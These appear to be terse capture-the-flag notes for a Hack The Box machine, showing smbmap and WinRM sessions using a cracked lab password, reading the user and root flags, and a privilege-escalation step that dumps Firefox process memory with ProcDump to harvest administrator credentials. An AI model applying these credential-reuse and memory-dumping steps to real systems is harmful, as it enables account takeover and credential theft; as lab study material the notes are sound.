
Cisco Hash Cracker
http://www.ifm.net.nz/cookbooks/passwordcracker.html


root@kali:~/HTB/Heist# smbmap -u Hazard -p stealth1agent -H 10.10.10.149
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.149...
[+] IP: 10.10.10.149:445	Name: 10.10.10.149                                      
	Disk                                                  	Permissions
	----                                                  	-----------
	ADMIN$                                            	NO ACCESS
	C$                                                	NO ACCESS
	IPC$                                              	READ ONLY




root@kali:~/HTB/Heist# ruby winrm.rb
PS supportdesk\chase@SUPPORTDESK Documents> Get-ChildItem C:\ -name -recurse *user.txt
Users\Chase\Desktop\user.txt
PS supportdesk\chase@SUPPORTDESK Documents> type C:\Users\Chase\Desktop\user.txt
a127daef77ab6d9d92008653295f59c4
PS supportdesk\chase@SUPPORTDESK Documents> 

PS supportdesk\chase@SUPPORTDESK wwwroot> ls


Looking in the Default IIS root folder for the website

    Directory: C:\inetpub\wwwroot


Mode                LastWriteTime         Length Name                                                                                                                                                                                                    
----                -------------         ------ ----                                                                                                                                                                                                    
d-----        4/21/2019   5:41 PM                attachments                                                                                                                                                                                             
d-----        4/21/2019   5:41 PM                css                                                                                                                                                                                                     
d-----        4/21/2019   5:41 PM                images                                                                                                                                                                                                  
d-----        4/21/2019   5:41 PM                js                                                                                                                                                                                                      
-a----        4/21/2019  11:51 AM           1240 errorpage.php                                                                                                                                                                                           
-a----        4/21/2019  11:33 AM            279 index.php                                                                                                                                                                                               
-a----        4/22/2019   8:38 AM           3034 issues.php                                                                                                                                                                                              
-a----        4/22/2019   6:48 AM           2657 login.php                                                                                                                                                                                               


PS supportdesk\chase@SUPPORTDESK wwwroot> type login.php


- get-process

- Dump firefox(running process) in memory content with ProcDump

procdump -ma <pid>

- look inside .dmp for admin creds

PS supportdesk\administrator@SUPPORTDESK desktop> type root.txt
50dfa3c6bfd20e2e0d071b073d766897
PS supportdesk\administrator@SUPPORTDESK desktop> 

